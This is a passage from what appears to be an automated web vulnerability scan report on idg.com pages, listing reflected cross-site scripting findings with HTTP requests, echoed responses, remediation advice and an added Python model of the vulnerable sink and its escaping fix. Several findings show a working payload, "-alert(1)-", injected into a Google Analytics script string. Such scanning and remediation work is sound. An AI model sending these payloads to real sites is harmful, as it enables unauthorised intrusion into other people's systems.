Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3e6"%3b4e4e67dc4b8 was submitted in the REST URL parameter 1. This input was echoed as ac3e6";4e4e67dc4b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwac3e6"%3b4e4e67dc4b8/HomeNew.nsf/docs/FAQ HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwac3e6";4e4e67dc4b8/HomeNew.nsf/docs/FAQ");
} catch(err) {}</script>
...[SNIP]...

2.107. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ba3"%3bc63f355635b was submitted in the REST URL parameter 3. This input was echoed as 98ba3";c63f355635b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs98ba3"%3bc63f355635b/FAQ HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ba3";c63f355635b/FAQ");
} catch(err) {}</script>
...[SNIP]...
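Added example, a constructed model rather than Lotus Domino's or IDG's code: items 2.98 to 2.107 all reach the same sink, the request path interpolated into the string literal passed to pageTracker._trackPageview() on the "Page not found" template. The Certain findings close the literal and splice in -alert(1)- so the expression still parses; the Firm findings only show that "; terminates the string. HTML entity encoding is no fix here, because the HTML parser hands the contents of a <script> block to the JavaScript engine without decoding entities. The block below reproduces the vulnerable line, serializes the string with json.dumps() plus \u-escapes for <, > and &, and includes a small literal walker that reports whether anything other than the call's own terminator follows the string. Where the page can avoid echoing the path into script at all, as the remediation note says, that remains the better option.

```python
import json

# Constructed model of the sink shown in 2.98 to 2.107: the request path lands
# inside the string literal passed to the Google Analytics call.


def render_tracker_vulnerable(path: str) -> str:
    """Raw interpolation into a double-quoted JavaScript string (what the responses show)."""
    return f'pageTracker._trackPageview("IDG.com - Page not found - {path}");'


def js_string_literal(value: str) -> str:
    """Serialize a str as a JavaScript string literal that is safe inside <script>.
    json.dumps() escapes quotes, backslashes and control characters and, with the
    default ensure_ascii=True, every non-ASCII code point including U+2028/U+2029.
    <, > and & are additionally \\u-escaped so neither '</script>' nor an entity
    can appear in the emitted source."""
    literal = json.dumps(value)
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def render_tracker_fixed(path: str) -> str:
    """Same call, with the whole message built as data and serialized once."""
    return ('pageTracker._trackPageview('
            + js_string_literal('IDG.com - Page not found - ' + path) + ');')


def split_first_literal(js: str):
    """Walk the first double-quoted literal the way the JS tokenizer does, honouring
    backslash escapes. Returns (literal body as written, source after the closing quote)."""
    i = js.index('"') + 1
    body = []
    while i < len(js):
        ch = js[i]
        if ch == '\\':                 # escape sequence: take both characters
            body.append(js[i:i + 2])
            i += 2
            continue
        if ch == '"':
            return ''.join(body), js[i + 1:]
        body.append(ch)
        i += 1
    raise ValueError('unterminated string literal')


def data_escaped_string(js: str) -> bool:
    """True when user data broke out of the literal: anything other than the call's
    own terminator ');' follows the closing quote."""
    _, rest = split_first_literal(js)
    return rest != ');'


# Probes from 2.98 (Certain) and 2.99 (Firm), as they appeared in the responses.
CERTAIN_PATH = '/www/homenew.nsf?faf07"-alert(1)-"514680829c4=1'
FIRM_PATH = '/idgnetrssfeeds.nsf/html641dd";e72f5765b93?openpage'

if __name__ == '__main__':
    for path in (CERTAIN_PATH, FIRM_PATH):
        print(data_escaped_string(render_tracker_vulnerable(path)))   # True
        print(data_escaped_string(render_tracker_fixed(path)))        # False
    print(render_tracker_fixed(CERTAIN_PATH))
```

The walker also makes the difference between the Certain and Firm findings concrete: for the Firm probes the remainder after the literal starts with ;e72f5765b93..., a terminated statement followed by junk, while for the Certain probes it starts with -alert(1)-"..., which keeps the original expression syntactically valid and executes.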

2.108. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string enclosed in double quotation marks. The payload fca5b"%3b8da2a1ee7b7 was submitted in REST URL parameter 4 and was echoed as fca5b";8da2a1ee7b7 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/FAQfca5b"%3b8da2a1ee7b7 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQfca5b";8da2a1ee7b7");
} catch(err) {}</script>
...[SNIP]...

2.109. http://idg.com/www/HomeNew.nsf/docs/FAQ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string enclosed in double quotation marks. The payload fafea"-alert(1)-"067a0a1a13e was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the string literal, subtracts the result of alert(1) and opens a new string, so the statement stays syntactically valid and alert(1) runs when the block executes; the page's try/catch wrapper does not prevent this. The server answered with HTTP 400 Bad Request, which does not affect exploitability: the browser renders the body and executes the script it contains.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1");
} catch(err) {}</script>
...[SNIP]...

2.110. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string enclosed in double quotation marks. The payload 24d1e"%3bdadbac10c59 was submitted in REST URL parameter 1 and was echoed as 24d1e";dadbac10c59 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www24d1e"%3bdadbac10c59/HomeNew.nsf/docs/IDG_News HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www24d1e";dadbac10c59/HomeNew.nsf/docs/IDG_News");
} catch(err) {}</script>
...[SNIP]...

2.111. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string enclosed in double quotation marks. The payload c5f39"%3b63b032dcd9f was submitted in REST URL parameter 3 and was echoed as c5f39";63b032dcd9f in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docsc5f39"%3b63b032dcd9f/IDG_News HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsc5f39";63b032dcd9f/IDG_News");
} catch(err) {}</script>
...[SNIP]...

2.112. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string enclosed in double quotation marks. The payload d821a"%3becac31d59cc was submitted in REST URL parameter 4 and was echoed as d821a";ecac31d59cc in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/IDG_Newsd821a"%3becac31d59cc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_Newsd821a";ecac31d59cc");
} catch(err) {}</script>
...[SNIP]...

2.113. http://idg.com/www/HomeNew.nsf/docs/IDG_News [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string enclosed in double quotation marks. The payload 1aee3"-alert(1)-"3f5767d6355 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the string literal, subtracts the result of alert(1) and opens a new string, so the statement stays syntactically valid and alert(1) runs when the block executes; the page's try/catch wrapper does not prevent this. The server answered with HTTP 400 Bad Request, which does not affect exploitability: the browser renders the body and executes the script it contains.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1");
} catch(err) {}</script>
...[SNIP]...

2.114. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string enclosed in double quotation marks. The payload d38df"%3b63795650db was submitted in REST URL parameter 1 and was echoed as d38df";63795650db in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /wwwd38df"%3b63795650db/HomeNew.nsf/docs/News_Service_Intro HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd38df";63795650db/HomeNew.nsf/docs/News_Service_Intro");
} catch(err) {}</script>
...[SNIP]...

2.115. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string enclosed in double quotation marks. The payload 6f31a"%3bf49933a2289 was submitted in REST URL parameter 3 and was echoed as 6f31a";f49933a2289 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs6f31a"%3bf49933a2289/News_Service_Intro HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6f31a";f49933a2289/News_Service_Intro");
} catch(err) {}</script>
...[SNIP]...

2.116. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string enclosed in double quotation marks. The payload ec197"%3bcf066359d11 was submitted in REST URL parameter 4 and was echoed as ec197";cf066359d11 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/News_Service_Introec197"%3bcf066359d11 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Introec197";cf066359d11");
} catch(err) {}</script>
...[SNIP]...

2.117. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string enclosed in double quotation marks. The payload 82f97"-alert(1)-"2417de8ae21 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the string literal, subtracts the result of alert(1) and opens a new string, so the statement stays syntactically valid and alert(1) runs when the block executes; the page's try/catch wrapper does not prevent this. The server answered with HTTP 400 Bad Request, which does not affect exploitability: the browser renders the body and executes the script it contains.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

